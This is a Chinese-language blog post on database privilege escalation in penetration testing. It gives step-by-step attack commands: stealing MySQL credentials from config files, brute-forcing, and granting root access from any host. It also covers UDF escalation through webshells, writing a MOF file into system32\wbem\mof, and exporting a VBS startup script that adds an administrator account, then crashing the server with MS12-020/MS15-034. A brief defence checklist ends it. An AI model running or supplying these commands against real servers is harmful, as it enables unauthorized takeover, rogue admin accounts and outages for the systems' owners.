滲透測(cè)試之?dāng)?shù)據(jù)庫(kù)提權(quán)

一:如何獲取mysql賬號(hào)密碼

1.查看網(wǎng)站配置文件

如:conn、config、data、sql、common、inc等。


可以直接右鍵編輯查看文件內(nèi)容? 獲取mysql賬號(hào)密碼

2.查看數(shù)據(jù)庫(kù)安裝路徑下的mysql文件?

安裝目錄為/data/mysql/user.myd和user.myi


將黃色方框內(nèi)的文件下載到本地 用文本編輯器打開(kāi)就可以看到明文賬號(hào)和md5加密后的密碼

直接去cdm5就可以解密

3.通過(guò)暴力破解得到

hscan、Bruter、hydra、腳本木馬(爆破mysql密碼需要mysql開(kāi)啟遠(yuǎn)程鏈接)

登錄到mysql中,為root進(jìn)行遠(yuǎn)程訪問(wèn)的授權(quán),執(zhí)行下面的命令:?

mysql>GRANT ALL PRIVILEGES ON *.* TO root@"%" IDENTIFIED BY"root";

mysql>flush privileges;?

第一句中"%"表示任何主機(jī)都可以遠(yuǎn)程登錄到該服務(wù)器上訪問(wèn)。如果要限制只有某臺(tái)機(jī)器可以訪問(wèn),將其換成相應(yīng)的IP即可,如:GRANT

ALL PRIVILEGES ON *.* TO root@“%" IDENTIFIED BY "root";第二句表示從mysql數(shù)據(jù)庫(kù)的grant表中重新加載權(quán)限數(shù)據(jù)。因?yàn)镸ySQL把權(quán)限都放在了cache中,所以在做完更改后需要重新加載。

二:UDF提權(quán)

需要配合提權(quán)工具進(jìn)行提權(quán)

需要先開(kāi)啟MySQL root 賬號(hào)的遠(yuǎn)程登陸權(quán)限? 這里如果之前開(kāi)啟了就從網(wǎng)站配置文件里面找,如果手動(dòng)開(kāi)啟的話,開(kāi)啟后的root對(duì)應(yīng)的密碼就是默認(rèn)的密碼? root? 并不是網(wǎng)站配置文件里面的那個(gè)密碼,這個(gè)不知道是為啥,我開(kāi)啟之后怎么鏈接也連接不上? 然后看了下數(shù)據(jù)庫(kù)? 有一個(gè)密碼和其他的不同


開(kāi)啟好之后直接用工具連接


登錄成功后去??C:\phpStudy\MySQL\lib\plugin\? 這里用菜刀或者大馬創(chuàng)建文件夾? ?plugin


這里直接在虛擬機(jī)里面創(chuàng)建了


把導(dǎo)入的目錄配置好? ?點(diǎn)擊執(zhí)行? ?下面sql命令那里面就會(huì)有sql命令??


想用哪個(gè)就創(chuàng)建哪個(gè)函數(shù)


提權(quán)成功

腳本提權(quán)

主要解決MySQL無(wú)法遠(yuǎn)程登錄問(wèn)題

使用菜刀或者webshell將提權(quán)腳本上傳到服務(wù)器


輸入MySQL的賬號(hào)和密碼 連接上? 使用腳本提權(quán)就不需要再開(kāi)啟MySQL的遠(yuǎn)程登錄? 直接使用網(wǎng)站配置文件里面找到的賬號(hào)密碼連接就可以


這個(gè)也是? 先創(chuàng)建plugin目錄? 然后直接導(dǎo)出udp就可以


直接可以運(yùn)行管理員命令?

提權(quán)成功

三:MOF漏洞提權(quán)

1.直接通過(guò)工具創(chuàng)建新的賬號(hào)進(jìn)行提權(quán)

2.手工通過(guò)webshell數(shù)據(jù)庫(kù)語(yǔ)句創(chuàng)建賬號(hào)

?1.找個(gè)可寫(xiě)目錄,上傳mof文件

?2.執(zhí)行sql

select load_file('C:\\wmpub\\moon.mof') into dumpfile 'c:/windows/system32/wbem/mof/moon.mof';

注意新建的帳號(hào)每隔5分鐘就會(huì)新建帳號(hào),刪除帳號(hào)的辦法如下:

第一 net stop winmgmt 停止服務(wù),

第二 刪除文件夾:C:\WINDOWS\system32\wbem\Repository\

第三 net start winmgmt 啟動(dòng)服務(wù)

第四:完畢不會(huì)在執(zhí)行了。

C:\WINDOWS\system32\wbem\Repository\ 放的是儲(chǔ)存庫(kù) 我們執(zhí)行的.mof都會(huì)被加入到這個(gè)庫(kù)了。

然后一直按腳本設(shè)置的時(shí)間執(zhí)行。。

刪除后 重新啟動(dòng) 會(huì)重建個(gè)默認(rèn)儲(chǔ)存庫(kù) 這樣我們先前執(zhí)行mof就沒(méi)了。


四:Mysql啟動(dòng)項(xiàng)提權(quán)

1.通過(guò)MySQL數(shù)據(jù)庫(kù)命令寫(xiě)入VBS腳本

2.直接通過(guò)Webshell的Mysql寫(xiě)入啟動(dòng)項(xiàng)

3.通過(guò)MS12-020、MS15-034重啟服務(wù)器


mysql>drop database test1;

mysql> create database test1;

mysql> use test1;

mysql> create table a (cmd text);

mysql>insert into a values ("set wshshell=createobject (""wscript.shell"")");

mysql>insert into a values ("a=wshshell.run (""cmd.exe /c net user

best best /add"",0)");

mysql>insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup Administrators best

/add"",0)");

注意雙引號(hào)和括號(hào)以及后面的“0”一定要輸入!我們將用這三條命令來(lái)建立一個(gè)VBS的腳本程序!

mysql>select * from a;

mysql>select * from a into outfile

"c://docume~1//administrator//「開(kāi)始」菜單//程序//啟動(dòng)//best.vbs";

最后通過(guò)溢出漏洞讓服務(wù)器重啟,如:MS12-020、MS15-034

五:mssql數(shù)據(jù)庫(kù)提權(quán)

mssql提權(quán)主要分為弱口令與溢出兩類(lèi)提權(quán)。目前主要通過(guò)弱口令連接直接提權(quán),溢出類(lèi)Mssql數(shù)據(jù)庫(kù)幾乎很少見(jiàn)。

工具下載地址:https://www.jb51.net/database/553302.html


直接使用工具可以提權(quán)? 可以使用工具恢復(fù)xp_cmdshell執(zhí)行系統(tǒng)命令

六:Oracle提權(quán)

直接使用工具提權(quán)


也可以參照網(wǎng)絡(luò)文章??http://wenku.baidu.com/link?url=DAU-gUL4EpfniDqH3TV4lvQ4W9HRRm-sWCzFqVNJWSnBgfCfm0iu-6DunEAcFgI0STlvJCgNgbq2BwPalWIcaptP72SDTcq77BtpRRvPSGG

七:安全防御

1、限止數(shù)據(jù)庫(kù)遠(yuǎn)程連接,給數(shù)據(jù)庫(kù)帳戶(hù)設(shè)置密碼必須>8位以上并數(shù)字+字母+特殊符號(hào)等。

2、不要給網(wǎng)站配置root或SA權(quán)限。必須給每個(gè)網(wǎng)站獨(dú)立分配數(shù)據(jù)庫(kù)帳戶(hù)并限格控制好權(quán)限。

3、及時(shí)升級(jí)數(shù)據(jù)庫(kù)補(bǔ)丁。

4、安裝Waf進(jìn)行防御。

5、購(gòu)買(mǎi)數(shù)據(jù)庫(kù)審計(jì)設(shè)備

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書(shū)系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

友情鏈接更多精彩內(nèi)容